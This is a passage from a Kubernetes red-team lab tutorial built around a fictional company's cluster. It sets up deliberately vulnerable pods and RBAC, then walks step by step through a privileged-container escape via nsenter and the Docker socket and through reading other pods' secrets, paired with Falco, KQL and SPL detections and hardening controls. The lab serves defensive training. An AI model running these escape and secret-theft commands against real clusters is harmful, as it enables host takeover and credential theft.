Lab 26: Container & Kubernetes Red Teaming¶
Chapters: 20 — Cloud Attack & Defense Playbook | 46 — Cloud & Container Red Teaming Difficulty: ⭐⭐⭐⭐ Expert Estimated Time: 4–5 hours Prerequisites: Chapter 20, Chapter 46, Lab 13 (Cloud Red Team), basic Docker/Kubernetes knowledge
Overview¶
In this lab you will:
- Escape a privileged container to the underlying host node using capability abuse, nsenter, and mount exploitation — then pivot to access other pods' secrets
- Exploit overly permissive Kubernetes RBAC bindings to escalate from a limited service account to cluster-admin privileges
- Extract secrets directly from etcd on the control plane, decode them, and demonstrate why encryption at rest is critical
- Attack an Istio service mesh by bypassing mTLS, hijacking traffic with VirtualService manipulation, and performing sidecar injection attacks
- Compromise the CI/CD-to-cluster supply chain through vulnerable base images, trojanized containers, image pull policy abuse, and admission control bypass
- Write KQL and SPL detection queries for every attack technique — both for cloud-native (AKS/EKS) audit logs and on-premise SIEM ingestion
- Map all findings to MITRE ATT&CK techniques with defensive countermeasures
Synthetic Data Only
All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials shown as REDACTED. This lab is for defensive education only — never use these techniques against systems you do not own or without explicit written authorization.
Scenario¶
Engagement Brief — Helios Cloud Technologies
Organization: Helios Cloud Technologies (fictional) Platform: SkyForge — cloud-native microservices platform for enterprise data analytics Cluster: skyforge-prod.k8s.example.com (SYNTHETIC) Registry: registry.helios.example.com (SYNTHETIC) API Server: https://203.0.113.40:6443 (SYNTHETIC — RFC 5737) Node Network: 10.60.0.0/16 (SYNTHETIC) Pod Network: 10.244.0.0/16 (SYNTHETIC) Service Network: 10.96.0.0/12 (SYNTHETIC) Cloud Provider: AWS EKS (SYNTHETIC — Account ID 987654321098) Service Mesh: Istio 1.21 with mTLS enabled Engagement Type: Full-scope Kubernetes red team assessment Scope: All Kubernetes workloads, container runtime, RBAC configuration, etcd, service mesh, CI/CD pipeline, container registry Out of Scope: AWS control plane (IAM), DNS infrastructure, DDoS testing, physical infrastructure Test Window: 2026-04-07 08:00 – 2026-04-11 20:00 UTC Emergency Contact: soc@helios.example.com (SYNTHETIC)
Summary: Helios Cloud Technologies runs its SkyForge analytics platform on Kubernetes (AWS EKS) with Istio service mesh. Following a board-mandated security review after a competitor suffered a major container breakout incident, Helios has engaged your red team to simulate a realistic adversary with initial pod-level access. Your mission: escalate from a compromised application pod to full cluster compromise, demonstrating each attack path and the detection opportunities defenders have at every stage. The security team will use your findings to harden their Kubernetes posture, improve runtime monitoring, and validate their Falco rule coverage.
Certification Relevance¶
Certification Mapping
This lab maps to objectives in the following certifications:
| Certification | Relevant Domains |
|---|---|
| CKS (Certified Kubernetes Security Specialist) | Cluster Setup (10%), System Hardening (15%), Minimize Microservice Vulnerabilities (20%), Supply Chain Security (20%), Monitoring/Logging/Runtime Security (20%) |
| OSCP / OSEP | Privilege escalation, lateral movement, container breakout |
| AWS Certified Security — Specialty (SCS-C02) | Domain 3: Infrastructure Protection, Domain 4: IAM |
| CompTIA PenTest+ (PT0-003) | Domain 3: Attacks and Exploits, Domain 4: Reporting and Communication |
| GIAC Cloud Penetration Tester (GCPN) | Container and orchestration attacks |
MITRE ATT&CK Mapping¶
Throughout this lab, findings map to the following techniques:
| Technique ID | Name | Tactic | Exercise |
|---|---|---|---|
| T1611 | Escape to Host | Privilege Escalation | Exercise 1 |
| T1610 | Deploy Container | Execution | Exercise 2 |
| T1078.004 | Valid Accounts: Cloud Accounts | Persistence, Privilege Escalation | Exercise 2 |
| T1552.007 | Unsecured Credentials: Container API | Credential Access | Exercise 3 |
| T1552.001 | Unsecured Credentials: Credentials in Files | Credential Access | Exercise 3 |
| T1557 | Adversary-in-the-Middle | Collection | Exercise 4 |
| T1071.001 | Application Layer Protocol: Web Protocols | Command and Control | Exercise 4 |
| T1195.002 | Supply Chain Compromise: Compromise Software Supply Chain | Initial Access | Exercise 5 |
| T1525 | Implant Internal Image | Persistence | Exercise 5 |
| T1613 | Container and Resource Discovery | Discovery | Exercises 1–5 |
Prerequisites¶
Required Tools¶
| Tool | Purpose | Version |
|---|---|---|
| kubectl | Kubernetes CLI | 1.29+ |
| docker | Container runtime | 24.x+ |
| minikube or kind | Local Kubernetes cluster | Latest |
| trivy | Container image vulnerability scanner | 0.50+ |
| falco | Runtime security monitoring | 0.37+ |
| kube-hunter | Kubernetes penetration testing | 0.6+ |
| peirates | Kubernetes post-exploitation tool | 1.1+ |
| helm | Kubernetes package manager | 3.14+ |
| istioctl | Istio service mesh CLI | 1.21+ |
| etcdctl | etcd CLI client | 3.5+ |
| jq | JSON parsing | 1.7+ |
| curl | HTTP requests | 8.x+ |
| nsenter | Namespace entry (Linux) | util-linux |
| crictl | Container runtime interface CLI | 1.29+ |
Test Accounts (Synthetic)¶
| Role | Username | Token | Namespace | Notes |
|---|---|---|---|---|
| Compromised App Pod | data-processor-sa | REDACTED | skyforge-prod | Initial foothold — limited SA |
| CI/CD Service Account | deploy-pipeline-sa | REDACTED | skyforge-ci | Deployment permissions |
| Monitoring Agent | monitoring-sa | REDACTED | monitoring | Read-only cluster-wide |
| Cluster Admin | admin | REDACTED | * | Full access (goal) |
| Auditor | auditor | REDACTED | * | Read-only (for validation) |
Lab Environment Setup¶
# Create a local Kubernetes cluster with kind (SYNTHETIC)
# kind-config.yaml enables multiple nodes for realistic attack surface
$ cat <<'EOF' > kind-config.yaml
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
extraMounts:
- hostPath: /var/run/docker.sock
containerPath: /var/run/docker.sock
- role: worker
extraPortMappings:
- containerPort: 30080
hostPort: 30080
- role: worker
- role: worker
EOF
$ kind create cluster --name skyforge-lab --config kind-config.yaml
Creating cluster "skyforge-lab" ...
✓ Ensuring node image (kindest/node:v1.29.2)
✓ Preparing nodes 📦 📦 📦 📦
✓ Writing configuration 📝
✓ Starting control-plane 🕹️
✓ Installing CNI 🔌
✓ Installing StorageClass 💾
✓ Joining worker nodes 🚜
Set kubectl context to "kind-skyforge-lab"
# Verify cluster is running
$ kubectl cluster-info --context kind-skyforge-lab
Kubernetes control plane is running at https://127.0.0.1:38291
CoreDNS is running at https://127.0.0.1:38291/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
# Create namespaces
$ kubectl create namespace skyforge-prod
namespace/skyforge-prod created
$ kubectl create namespace skyforge-ci
namespace/skyforge-ci created
$ kubectl create namespace monitoring
namespace/monitoring created
$ kubectl create namespace istio-system
namespace/istio-system created
$ kubectl create namespace skyforge-staging
namespace/skyforge-staging created
Deploy Lab Workloads (Synthetic)¶
# Deploy the vulnerable data-processor pod (initial foothold)
$ cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: ServiceAccount
metadata:
name: data-processor-sa
namespace: skyforge-prod
---
apiVersion: v1
kind: Pod
metadata:
name: data-processor
namespace: skyforge-prod
labels:
app: data-processor
version: v2.1.0
spec:
serviceAccountName: data-processor-sa
containers:
- name: processor
image: registry.helios.example.com/skyforge/data-processor:2.1.0
securityContext:
privileged: true
capabilities:
add: ["SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN"]
volumeMounts:
- name: host-fs
mountPath: /host
- name: docker-sock
mountPath: /var/run/docker.sock
env:
- name: DB_CONNECTION
value: "postgresql://analytics:REDACTED@10.60.2.10:5432/skyforge"
- name: REDIS_URL
value: "redis://10.60.2.20:6379"
volumes:
- name: host-fs
hostPath:
path: /
- name: docker-sock
hostPath:
path: /var/run/docker.sock
EOF
pod/data-processor created
# Deploy additional microservices
$ cat <<'EOF' | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
name: auth-service
namespace: skyforge-prod
spec:
replicas: 2
selector:
matchLabels:
app: auth-service
template:
metadata:
labels:
app: auth-service
version: v1.8.3
spec:
serviceAccountName: auth-service-sa
containers:
- name: auth
image: registry.helios.example.com/skyforge/auth-service:1.8.3
ports:
- containerPort: 8080
env:
- name: JWT_SECRET
valueFrom:
secretKeyRef:
name: auth-secrets
key: jwt-secret
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: api-gateway
namespace: skyforge-prod
spec:
replicas: 3
selector:
matchLabels:
app: api-gateway
template:
metadata:
labels:
app: api-gateway
version: v3.2.1
spec:
containers:
- name: gateway
image: registry.helios.example.com/skyforge/api-gateway:3.2.1
ports:
- containerPort: 443
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: report-engine
namespace: skyforge-prod
spec:
replicas: 1
selector:
matchLabels:
app: report-engine
template:
metadata:
labels:
app: report-engine
version: v1.4.0
spec:
containers:
- name: reports
image: registry.helios.example.com/skyforge/report-engine:1.4.0
ports:
- containerPort: 8443
EOF
deployment.apps/auth-service created
deployment.apps/api-gateway created
deployment.apps/report-engine created
# Create secrets used by the workloads
$ kubectl create secret generic auth-secrets \
--from-literal=jwt-secret=REDACTED \
--from-literal=oauth-client-secret=REDACTED \
-n skyforge-prod
secret/auth-secrets created
$ kubectl create secret generic db-credentials \
--from-literal=username=skyforge_admin \
--from-literal=password=REDACTED \
--from-literal=connection-string="postgresql://skyforge_admin:REDACTED@10.60.2.10:5432/skyforge" \
-n skyforge-prod
secret/db-credentials created
$ kubectl create secret generic tls-certs \
--from-literal=tls.crt=REDACTED-CERTIFICATE-DATA \
--from-literal=tls.key=REDACTED-PRIVATE-KEY-DATA \
-n skyforge-prod
secret/tls-certs created
$ kubectl create secret generic registry-creds \
--from-literal=.dockerconfigjson='{"auths":{"registry.helios.example.com":{"auth":"REDACTED"}}}' \
--type=kubernetes.io/dockerconfigjson \
-n skyforge-ci
secret/registry-creds created
Deploy Intentionally Vulnerable RBAC (Synthetic)¶
# Overly permissive ClusterRole — common misconfiguration
$ cat <<'EOF' | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: skyforge-developer
rules:
- apiGroups: [""]
resources: ["pods", "pods/exec", "pods/log", "services", "configmaps"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get", "list"]
- apiGroups: ["apps"]
resources: ["deployments", "replicasets", "daemonsets"]
verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["clusterroles", "clusterrolebindings", "roles", "rolebindings"]
verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: skyforge-developer-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: skyforge-developer
subjects:
- kind: ServiceAccount
name: data-processor-sa
namespace: skyforge-prod
---
# Dangerous: CI/CD SA with escalation path
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: ci-deployer
rules:
- apiGroups: [""]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["apps"]
resources: ["*"]
verbs: ["*"]
- apiGroups: ["rbac.authorization.k8s.io"]
resources: ["*"]
verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: ci-deployer-binding
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: ci-deployer
subjects:
- kind: ServiceAccount
name: deploy-pipeline-sa
namespace: skyforge-ci
EOF
clusterrole.rbac.authorization.k8s.io/skyforge-developer created
clusterrolebinding.rbac.authorization.k8s.io/skyforge-developer-binding created
clusterrole.rbac.authorization.k8s.io/ci-deployer created
clusterrolebinding.rbac.authorization.k8s.io/ci-deployer-binding created
Lab Architecture (Synthetic)¶
┌───────────────────────────────────────────────────────────────────────────────────┐
│ Helios Cloud — SkyForge Kubernetes Architecture │
│ │
│ ┌─────────────────────────────────────────────────────────────────────────────┐ │
│ │ AWS EKS Cluster (SYNTHETIC) │ │
│ │ API Server: 203.0.113.40:6443 │ │
│ │ etcd: 203.0.113.41:2379 │ │
│ │ │ │
│ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │ │
│ │ │ Node 1 │ │ Node 2 │ │ Node 3 │ │ │
│ │ │ 10.60.1.10 │ │ 10.60.1.20 │ │ 10.60.1.30 │ │ │
│ │ │ │ │ │ │ │ │ │
│ │ │ ┌──────────────┐│ │ ┌──────────────┐│ │ ┌──────────────┐│ │ │
│ │ │ │data-processor││ │ │ auth-service ││ │ │ report-engine││ │ │
│ │ │ │ (FOOTHOLD) ││ │ │ (2 replicas) ││ │ │ ││ │ │
│ │ │ │ privileged: ││ │ │ ││ │ │ ││ │ │
│ │ │ │ true ││ │ └──────────────┘│ │ └──────────────┘│ │ │
│ │ │ └──────────────┘│ │ ┌──────────────┐│ │ ┌──────────────┐│ │ │
│ │ │ ┌──────────────┐│ │ │ api-gateway ││ │ │ notif-svc ││ │ │
│ │ │ │ analytics- ││ │ │ (3 replicas) ││ │ │ ││ │ │
│ │ │ │ worker ││ │ │ ││ │ │ ││ │ │
│ │ │ └──────────────┘│ │ └──────────────┘│ │ └──────────────┘│ │ │
│ │ └─────────────────┘ └─────────────────┘ └─────────────────┘ │ │
│ │ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ Istio Service Mesh — mTLS enabled │ │ │
│ │ │ istiod: 10.96.0.50 | ingress-gw: 203.0.113.42 │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ │ │ │
│ │ ┌─────────────────────────────────────────────────────┐ │ │
│ │ │ Data Services │ │ │
│ │ │ PostgreSQL: 10.60.2.10 | Redis: 10.60.2.20 │ │ │
│ │ │ Kafka: 10.60.2.30 | Vault: 10.60.2.40 │ │ │
│ │ │ etcd: 203.0.113.41:2379 (control plane) │ │ │
│ │ └─────────────────────────────────────────────────────┘ │ │
│ └─────────────────────────────────────────────────────────────────────────────┘ │
│ │
│ ┌───────────────────────┐ ┌────────────────────────┐ ┌──────────────────────┐ │
│ │ Container Registry │ │ CI/CD Pipeline │ │ Monitoring Stack │ │
│ │ registry.helios │ │ Jenkins: 10.60.3.10 │ │ Prometheus/Grafana │ │
│ │ .example.com │ │ ArgoCD: 10.60.3.20 │ │ Falco / Fluentd │ │
│ └───────────────────────┘ └────────────────────────┘ └──────────────────────┘ │
└───────────────────────────────────────────────────────────────────────────────────┘
Exercise 1: Container Escape¶
Time Estimate: 60–75 minutes ATT&CK Mapping: T1611 (Escape to Host), T1613 (Container and Resource Discovery)
Objectives¶
- Enumerate container capabilities, mounted volumes, and security context from inside a compromised pod
- Identify host filesystem access via
/proc/1/rootand mountedhostPathvolumes - Escape to the underlying host node using
nsenterand capability exploitation - Access other pods' secrets and data from the host level
- Understand the detection surface at every stage of the escape
Background¶
Container escape is one of the most critical attack paths in Kubernetes environments. When a pod runs with privileged: true or has SYS_ADMIN capability, the container's isolation boundary becomes paper-thin. An attacker who gains code execution inside such a pod can reach the underlying node, and from there, potentially the entire cluster.
In this exercise, you are simulating an attacker who has gained remote code execution inside the data-processor pod through a deserialization vulnerability in the analytics pipeline. The pod was deployed by a well-meaning SRE team who needed host-level access for performance monitoring — a common real-world misconfiguration.
Step 1.1: Initial Reconnaissance Inside the Pod¶
# You have a shell inside the compromised data-processor pod
# First: identify where you are and what you have
$ whoami
root
$ hostname
data-processor
$ cat /etc/os-release | head -3
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
Enumerate the Kubernetes environment:
# Check if this is a Kubernetes pod
$ env | grep -i kube
KUBERNETES_SERVICE_HOST=10.96.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_SERVICE_PORT_HTTPS=443
# Locate the service account token (auto-mounted)
$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
drwxrwxrwt 3 root root 140 Apr 7 08:15 .
drwxr-xr-x 3 root root 4096 Apr 7 08:15 ..
lrwxrwxrwx 1 root root 13 Apr 7 08:15 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root 16 Apr 7 08:15 namespace -> ..data/namespace
lrwxrwxrwx 1 root root 12 Apr 7 08:15 token -> ..data/token
$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
skyforge-prod
# Store the token for later use
$ export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ export CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ export APISERVER=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}
Step 1.2: Enumerate Container Capabilities¶
# Check if we're running as privileged
$ cat /proc/1/status | grep -i cap
CapInh: 0000003fffffffff
CapPrm: 0000003fffffffff
CapEff: 0000003fffffffff
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
# Decode capabilities using capsh
$ capsh --decode=0000003fffffffff
0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,
cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,
cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,
cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,
cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,
cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,
cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,
cap_wake_alarm,cap_block_suspend,cap_audit_read
Finding: Full Capabilities Enabled
The pod has all Linux capabilities including SYS_ADMIN, SYS_PTRACE, NET_ADMIN, and SYS_MODULE. This is equivalent to running as root on the host. Combined with privileged: true, this container has no meaningful isolation from the host kernel.
# Check security context — is this pod privileged?
$ cat /proc/1/cgroup
0::/system.slice/containerd.service
# Check if we can see host PID namespace
$ ls /proc/ | head -20
1
2
3
...
47
48
50
...
# Verify — can we see host processes? (privileged + hostPID would show them)
$ ps aux | head -10
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 5340 3020 ? Ss 08:15 0:00 /bin/sh -c python3 /app/processor.py
root 15 0.5 2.1 52340 42000 ? Sl 08:15 0:12 python3 /app/processor.py
root 89 0.0 0.0 2388 696 pts/0 Ss 08:30 0:00 /bin/sh
root 95 0.0 0.0 7060 1580 pts/0 R+ 08:31 0:00 ps aux
Step 1.3: Identify Mounted Volumes¶
# Enumerate mount points
$ mount | grep -E "(host|docker|containerd)"
/dev/sda1 on /host type ext4 (rw,relatime)
tmpfs on /var/run/docker.sock type tmpfs (rw,nosuid,nodev,noexec)
# The host root filesystem is mounted at /host!
$ ls /host/
bin dev home lib lib64 media opt root sbin srv tmp var
boot etc host lib32 lost+found mnt proc run snap sys usr
# We also have the Docker socket
$ ls -la /var/run/docker.sock
srw-rw---- 1 root 998 0 Apr 7 08:00 /var/run/docker.sock
# Check /proc/1/root — can we reach the host init process?
$ ls /proc/1/root/
bin dev home lib lib64 media opt root sbin srv tmp var
boot etc host lib32 lost+found mnt proc run snap sys usr
Finding: Host Filesystem Mounted
The host root filesystem (/) is mounted at /host with read-write permissions. The Docker socket is also mounted inside the container. These two misconfigurations together provide trivial host escape.
Step 1.4: Escape to Host Using nsenter¶
# Method 1: nsenter — enter host namespaces from the container
# This works because we have SYS_ADMIN + SYS_PTRACE capabilities
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# nsenter targets PID 1 on the host (the init process)
$ nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash
# After nsenter, we are now operating in the HOST's namespace
$ hostname
ip-10-60-1-10.ec2.internal
$ whoami
root
$ cat /etc/hostname
ip-10-60-1-10.ec2.internal
# Verify we're on the host by checking for kubelet
$ ps aux | grep kubelet | head -3
root 1247 3.2 4.5 1987432 91240 ? Ssl 08:00 0:45 /usr/bin/kubelet \
--config=/var/lib/kubelet/config.yaml \
--container-runtime-endpoint=unix:///run/containerd/containerd.sock \
--kubeconfig=/etc/kubernetes/kubelet.conf \
--node-ip=10.60.1.10 \
--v=2
# We have escaped the container and are now root on the node!
$ id
uid=0(root) gid=0(root) groups=0(root)
Critical: Container Escape Achieved
Using nsenter targeting PID 1 with --mount --uts --ipc --net --pid flags, the attacker enters the host's namespaces. This is the canonical privileged container escape. From here, the attacker has root access to the Kubernetes node.
Step 1.5: Pivot from Host to Other Pods' Secrets¶
# Now on the host node — enumerate all containers running on this node
$ crictl ps
CONTAINER IMAGE CREATED STATE NAME POD ID
a1b2c3d4e5f6 registry... 2 hours ago Running data-processor f1e2d3c4b5
b2c3d4e5f6a1 registry... 2 hours ago Running analytics-worker g2f3e4d5c6
c3d4e5f6a1b2 registry... 2 hours ago Running auth-service h3g4f5e6d7
# Inspect another pod's filesystem
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.mounts[] | select(.destination | contains("secret"))'
{
"destination": "/var/run/secrets/kubernetes.io/serviceaccount",
"type": "bind",
"source": "/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx",
"options": ["rbind", "rprivate", "ro"]
}
# Read another pod's service account token
$ cat /var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~projected/kube-api-access-xxxxx/token
eyJhbGciOiJSUzI1NiIsImtpZCI6InN5bnRoZXRpYy1rZXkifQ.SYNTHETIC_TOKEN_ANALYTICS_WORKER.REDACTED_SIGNATURE
# Access another pod's environment variables (may contain secrets)
$ crictl inspect b2c3d4e5f6a1 | jq '.info.runtimeSpec.process.env[]' | grep -i -E "(pass|secret|key|token)"
"DB_PASSWORD=REDACTED"
"API_KEY=REDACTED"
"ANALYTICS_TOKEN=REDACTED"
# Read mounted secret volumes from other pods
$ find /var/lib/kubelet/pods/ -path "*/secrets/*" -type f 2>/dev/null
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/username
/var/lib/kubelet/pods/g2f3e4d5c6/volumes/kubernetes.io~secret/db-creds/password
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
/var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/oauth-client-secret
$ cat /var/lib/kubelet/pods/h3g4f5e6d7/volumes/kubernetes.io~secret/auth-secrets/jwt-secret
REDACTED
Finding: Cross-Pod Secret Theft via Host Access
After escaping to the host, all pod secrets on that node are accessible via the kubelet's local volume mounts. This is because Kubernetes mounts secret volumes as tmpfs directories on the node filesystem, readable by root. This demonstrates why node compromise = compromise of all workloads on that node.
Step 1.6: Alternative Escape — Docker Socket¶
# Method 2: Docker socket escape (if mounted)
# Back inside the original container
# EDUCATIONAL PSEUDOCODE — demonstrates the technique for defensive understanding
# Use the mounted Docker socket to create a privileged container on the host
$ docker -H unix:///var/run/docker.sock run -it --privileged \
--net=host --pid=host --ipc=host \
-v /:/host \
registry.helios.example.com/skyforge/base-image:latest \
chroot /host /bin/bash
# This creates a new container with host namespace access
# effectively giving a root shell on the host
Detection: Container Escape¶
Falco Rules¶
# Falco rule: Detect nsenter execution (container escape indicator)
- rule: Container Escape via nsenter
desc: Detects nsenter being used from within a container to enter host namespaces
condition: >
spawned_process and container and proc.name = "nsenter"
and proc.args contains "--target 1"
output: >
nsenter executed inside container targeting host PID namespace
(user=%user.name container=%container.name image=%container.image.repository
command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, T1611]
# Falco rule: Detect Docker socket access from container
- rule: Docker Socket Accessed from Container
desc: A process inside a container accessed the Docker socket
condition: >
container and (fd.name = /var/run/docker.sock or
fd.name = /run/docker.sock) and
evt.type in (connect, sendto)
output: >
Docker socket accessed from container
(user=%user.name container=%container.name command=%proc.cmdline
pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, docker_socket]
# Falco rule: Detect host filesystem read from container
- rule: Sensitive Host Path Read from Container
desc: Container process reading sensitive host paths via mounted volumes
condition: >
container and open_read and
(fd.name startswith /host/etc/ or
fd.name startswith /host/var/lib/kubelet/ or
fd.name startswith /host/root/)
output: >
Sensitive host path accessed from container
(file=%fd.name user=%user.name container=%container.name
command=%proc.cmdline pod=%k8s.pod.name)
priority: HIGH
tags: [container, file_access, host_path]
# Falco rule: Detect chroot from container
- rule: Chroot Detected in Container
desc: chroot called from within a container — potential escape attempt
condition: >
container and evt.type = chroot
output: >
chroot detected in container (user=%user.name container=%container.name
command=%proc.cmdline pod=%k8s.pod.name ns=%k8s.ns.name)
priority: CRITICAL
tags: [container, escape, chroot]
KQL Detection (Azure Kubernetes Service / Sentinel)¶
// KQL: Detect privileged container creation in AKS
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend PodSpec = AuditLog.requestObject.spec
| where PodSpec.containers[0].securityContext.privileged == true
or PodSpec.containers[0].securityContext.capabilities.add has "SYS_ADMIN"
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
PodName = AuditLog.objectRef.name,
Privileged = PodSpec.containers[0].securityContext.privileged,
Capabilities = PodSpec.containers[0].securityContext.capabilities
| sort by TimeGenerated desc
// KQL: Detect nsenter or chroot execution via container audit
ContainerLog
| where LogEntry has_any ("nsenter", "chroot /host", "mount --bind")
| extend ContainerID = ContainerID,
PodName = extract("pod_name=([\\w-]+)", 1, LogEntry),
Command = extract("command=(.+)", 1, LogEntry)
| project TimeGenerated, PodName, ContainerID, Command, LogEntry
| sort by TimeGenerated desc
// KQL: Detect hostPath volume mounts in pod creation
AzureDiagnostics
| where Category == "kube-audit"
| where log_s has "create" and log_s has "pods"
| extend AuditLog = parse_json(log_s)
| extend Volumes = AuditLog.requestObject.spec.volumes
| mv-expand Volume = Volumes
| where isnotempty(Volume.hostPath)
| project TimeGenerated,
User = AuditLog.user.username,
Namespace = AuditLog.objectRef.namespace,
PodName = AuditLog.objectRef.name,
HostPath = Volume.hostPath.path,
MountType = Volume.hostPath.type
| sort by TimeGenerated desc
SPL Detection (Splunk)¶
// SPL: Detect privileged container creation
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath "requestObject.spec.containers{}.securityContext.privileged" as privileged
| spath "requestObject.spec.containers{}.securityContext.capabilities.add{}" as capabilities
| where privileged="true" OR capabilities="SYS_ADMIN"
| table _time, user.username, objectRef.namespace, objectRef.name, privileged, capabilities
// SPL: Detect container escape tools
index=kubernetes sourcetype="kube:container-logs"
| search "nsenter" OR "chroot /host" OR "/proc/1/root" OR "docker.sock"
| eval severity="CRITICAL"
| table _time, pod_name, namespace, container_name, log, severity
// SPL: Detect hostPath volume mounts
index=kubernetes sourcetype="kube:audit"
verb=create objectRef.resource=pods
| spath "requestObject.spec.volumes{}.hostPath.path" as host_path
| where isnotnull(host_path)
| eval risk=case(
host_path="/", "CRITICAL",
host_path="/var/run/docker.sock", "CRITICAL",
host_path="/etc", "HIGH",
host_path="/var/log", "MEDIUM",
1=1, "LOW"
)
| table _time, user.username, objectRef.namespace, objectRef.name, host_path, risk
| sort -risk
Defensive Measures: Preventing Container Escape¶
Prevention Controls
1. Pod Security Standards (PSS)
Enforce the restricted Pod Security Standard at the namespace level:
apiVersion: v1
kind: Namespace
metadata:
name: skyforge-prod
labels:
pod-security.kubernetes.io/enforce: restricted
pod-security.kubernetes.io/audit: restricted
pod-security.kubernetes.io/warn: restricted
2. Deny Privileged Containers (OPA/Gatekeeper)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPPrivilegedContainer
metadata:
name: deny-privileged
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
excludedNamespaces: ["kube-system"]
3. Drop All Capabilities
securityContext:
runAsNonRoot: true
runAsUser: 65534
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop:
- ALL
4. Deny hostPath Volumes (OPA/Gatekeeper)
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
name: deny-host-filesystem
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
parameters:
allowedHostPaths: [] # No hostPath volumes allowed
5. Deny Docker Socket Mounts
apiVersion: constraints.gatekeeper.sh/v1beta1
kind: K8sPSPHostFilesystem
metadata:
name: deny-docker-socket
spec:
match:
kinds:
- apiGroups: [""]
kinds: ["Pod"]
parameters:
allowedHostPaths:
- pathPrefix: "/var/log"
readOnly: true
# /var/run/docker.sock is NOT listed — blocked by default
6. Enable Falco Runtime Monitoring
Deploy Falco as a DaemonSet with the container escape rules from this exercise.
Exercise 1 Summary¶
| Step | Action | Finding | Severity |
|---|---|---|---|
| 1.1 | Pod enumeration | Full capabilities + root user | Critical |
| 1.2 | Capability analysis | SYS_ADMIN + 37 other capabilities | Critical |
| 1.3 | Volume enumeration | Host root FS + Docker socket mounted | Critical |
| 1.4 | nsenter escape | Root shell on host node | Critical |
| 1.5 | Cross-pod pivot | All pod secrets on node accessible | Critical |
| 1.6 | Docker socket escape | Alternative escape path confirmed | Critical |
Exercise 2: RBAC Exploitation & Privilege Escalation¶
Time Estimate: 60–75 minutes ATT&CK Mapping: T1078.004 (Valid Accounts: Cloud Accounts), T1610 (Deploy Container)
Objectives¶
- Enumerate RBAC permissions from a compromised service account
- Discover overly permissive ClusterRole bindings that allow privilege escalation
- Create a privileged pod using the service account to escalate privileges
- Escalate to cluster-admin by exploiting RBAC misconfigurations
- Access the Kubernetes API server with elevated permissions
Background¶
